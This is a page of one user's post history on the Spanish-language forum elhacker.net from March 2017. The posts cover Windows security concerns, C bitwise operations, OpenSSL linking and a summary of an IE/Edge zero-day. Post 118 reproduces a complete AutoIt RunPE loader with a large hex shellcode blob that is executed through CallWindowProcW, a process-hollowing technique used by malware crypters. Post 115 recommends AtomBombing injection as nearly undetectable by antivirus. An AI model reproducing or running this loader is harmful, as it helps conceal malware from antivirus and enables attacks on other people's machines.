elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Píldoras formativas en seguridad de la información


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 42
111  Foros Generales / Foro Libre / Re: ¿Que podemos hacer para evitar esto? en: 3 Marzo 2017, 21:07
penetrar un windows no es facil... especialmente tras un router es virtualmente imposible...

la primera forma donde lo vulnera el usuario es instalando aplicaciones de origenes desconocidos... todo lo que se descargue debe ser de web de autor, algunas veces vulneran esas webs pero no es algo común, sin embargo, en un crack te puedes llegar sorpresas


osea que la recomendación sería que nos bajaramos el software solo de origenes conocidos lo digo porque actualmente con la cantidad de descubrimientos que hay uno puede verse en apuros. Un ejemplo quien use edge y explorer esta en riesgo durante uno o más meses.
112  Foros Generales / Foro Libre / Re: ¿Que podemos hacer para evitar esto? en: 3 Marzo 2017, 20:54
No pongas en un lugar publico lo que no quieras que vean otros

Es un buen comienzo
Si es un buen comienzo pero los descubrimientos están ahí y no veo a windows sacar parches del at.bomb. por ejemplo. Y cuando dices no poner en un lugar publico si yo creo una aplicación y la comparto para mejorar porque sería malo lo que tendrían es que perseguir a estas personas o sacar parches de seguridad.
113  Seguridad Informática / Seguridad / Re: que tipo de tecnica utilizan? en: 3 Marzo 2017, 20:46
Que alguien robe tus datos es grave y la ciber-dilencuencia un 100% cada año así que es mas grave todavia la situacion en la que se vive  :-(
114  Foros Generales / Foro Libre / ¿Que podemos hacer para evitar esto? en: 3 Marzo 2017, 20:35
Hola la seguridad en windows no existe  :-[ cada vez hay mas descubrimientos y vulnerar antivirus y la proteccion de windows resulta más facil como podemos evitar que la gente puede verse afectada por otras personas sin escrupulos o a veces nosotros mismos  :-[ cada vez que estemos conectados a internet corremos peligro  :-[
115  Programación / Programación C/C++ / Re: Ejecutar shellcode en C en: 3 Marzo 2017, 19:12
La mejor manera de inyectar código es usando el ataque AtomBombing es practicamente indetectable para la mayoría de antivirus. Pero también es valido cargar un shellcode memoria o usar un código cave. Por cierto no comprendo muy bien el código cave es lo mismo que una inyeccion de código o es algo diferente? Esque no comprendo muy bien que deferencia hay entre un código cave o inyectar código basicamente son lo mismo o estoy equivocado?
116  Sistemas Operativos / GNU/Linux / Re: Cual SO Linux le conviene a mi PC en: 3 Marzo 2017, 19:05
Yo estoy acostumbrado a kali que trae las herramientas necesarias para principiantes que empiezan en el pentesting salu2  :silbar:
117  Programación / Programación C/C++ / Re: enteros de 12 bits en: 3 Marzo 2017, 16:33
que tal amigo, gracias por tu respuesta.
a ver si me ayudas un poco a entender el codigo.

suponiendo que:
arr[0] = 0110 1010
arr[1] = 1100 0001

((short)arr[0])    //casteando a short nos quedaria el byte dentro de 2 bytes, es asi?
0000 0000 0110 1010 // quedando este valor
"<< 4" desplazaria los bits 4 veces hacia la izquierda, correcto?
0000 1010 0110 0000 // quedando este valor

arr[1] >> 4 // desplazaria los bits 4 veces hacia la derecha, quedando este valor:
0000 1100 0000 0000

aplicando '|' entre los dos valores:

0000 0000 0110 1010
0000 1100 0000 0000
//resultado:
0000 1100 0110 1010

entendi bien? si no es asi, podrias explicarme paso a paso como funcionan estas operaciones?


Hola no entiendo esto.
A ver tu tienes un array ejemplo:
int arr [2];

Y le asignas dos valores:
arr[0] = 0110 1010
arr[1] = 1100 0001

Código:
((short)arr[0])    //casteando a short nos quedaria el byte dentro de 2 bytes, es asi?

Eso quiere decir que tu cadena se alarga en 16 bits.

Pero porqué este valor?
Código:
0000 0000 0110 1010 // quedando este valor

Aqui dices esto:
Código:
"<< 4" desplazaria los bits 4 veces hacia la izquierda, correcto?
0000 1010 0110 0000 // quedando este valor

Pero lo correcto seria¿Porque este número de donde lo sacaron?:
Código:
0000 1100 0000 0000

Lo usastes en la posicion 1¿?
Código:
arr[1] >> 4

Y porque devuelve este valor?:
Código:
0000 1100 0000 0000

Aplicando esto:
Código:
0000 0000 0110 1010 | 0000 1100 0000 0000

Cuanto devolvería y porque? A vale es una division ok.
En cuanto esto sería una simple suma es correcto?
   1101 1001 1100 1000
   0000 0000 1111 1111
= 0000 0000 1100 1000

Hace tiempo que no repasaba las operaciones en binario tendré que repasarlas si me podeis aclarar alguno de estos puntos me seria util gracias.

Por otro lado porque
 0xFF valdria 0000 0000 1111 1111 ?

118  Programación / Programación General / RunPe en autoit falla! en: 3 Marzo 2017, 04:14
Código:
Hola estoy probando un Runpe en Autoit que cargue mi propio autoit  :o pero bueno por probar para ver si funciona el código es de un usuario de este foro:
[code width=200]
#cs -------------------------------------------------------
AutoIt Version: 3.3.8.1
Traducido Por..........: Pink
Agradecimientos: hamavb & iCodeInVB6
Script Function...: RunPE-ShellCode "Correr Ejecutable En memoria"
Uso..............: RunPE(Path,$archivobinario)
#ce -------------------------------------------------------

 Global $path = @ScriptDir
 Global $archivobinario = @ScriptFullPath

 RunPE($path,$archivobinario)

Func RunPE($path,$filebin)


local  $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"


Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")


DllStructSetData($BufferASM, 1, $ASM)
DllStructSetData($binBuffer, 1, $filebin)




Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
            "ptr", DllStructGetPtr($BufferASM), _
            "wstr", ($path), _
            "ptr", DllStructGetPtr($binBuffer), _
            "int", 0, _
            "int", 0)

EndFunc

Me devuelve este error por :(?


Estoy un poco atontado y no consigo resolverlo!
119  Seguridad Informática / Bugs y Exploits / vulnerabilidad 0-day explorer y edge en: 1 Marzo 2017, 23:59
El equipo de proyecto Zero ha revelado errores que afectan a los navegadores Explorer y Edge.
Este error que fue descubierto el 25 de noviembre de 2016, permite a los atacantes ejecutar código arbitrario en estos navegadores. Este error puede ser explotado por medio de un ataque al HandleColumnBreak OnColumnSpanningElement. Para llevar a cabo el
ataque lo hace por medio de 17 lineas de código html centrado en dos variables rcx y rax.
Un atacante puede manipular la variable rax modificando las propiedades de la tabla, como el borde de espacios y la anchura de la primera etiqueta <th>. Por lo que la pagina maliciosa solo tiene que apuntar la variable rax a la memoria controlada.

Referencia:
Al grupo Zero que descubrió esta falla.

120  Programación / Programación C/C++ / Re: No puedo declarar la variable por ser un tipo abstracto en: 1 Marzo 2017, 12:50
No conozco la librería pero dado que la clase hereda de esas otras clases, será que hay miembros que no has definido. Por ejemplo, virtual bool onTLSConnect(const CertInfo& Info), que lo tienes comentado. Quizás sea una función virtual pura.
tengo que incluir openssl para poder usarlo pero hasta tiempo que no lo hago y nunca lo he hecho en codeblocks como podría incluir las librerías openssl para solucionar este error en codeblocks?
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 42
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines